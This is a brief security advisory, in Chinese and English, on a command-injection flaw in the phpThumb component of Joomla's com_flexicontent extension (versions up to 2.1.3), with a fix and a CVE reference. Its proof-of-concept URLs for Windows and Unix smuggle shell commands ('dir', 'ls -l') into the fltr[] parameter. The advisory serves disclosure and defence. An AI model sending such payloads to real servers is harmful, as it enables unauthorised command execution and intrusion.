Joomla是一款内容管理系统。
该漏洞是包含在com_flexicontent包中的phpthumb已知漏洞,参数被传递到“ImageMagickThumbnailToGD”时,在"SafeExec"函数被利用。
0
Joomla com_flexicontent <=2.1.3
目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.joomla.org/
*----*
*POC:*
*Windows-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
-quality 75 -interlace line fail.jpg jpeg:fail.jpg %26%26 dir %26%26
&phpThumbDebug=9
*nix-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
-quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l ;
&phpThumbDebug=9
*----*
*Fix:*
Replace the phpthumb package being used with the latest version.
*----*
*References:*
http://www.cvedetails.com/cve/CVE-2010-1598/
*----*
Warm Regards,
Deepankar Arora and Rafay Baloch
RHA Infosec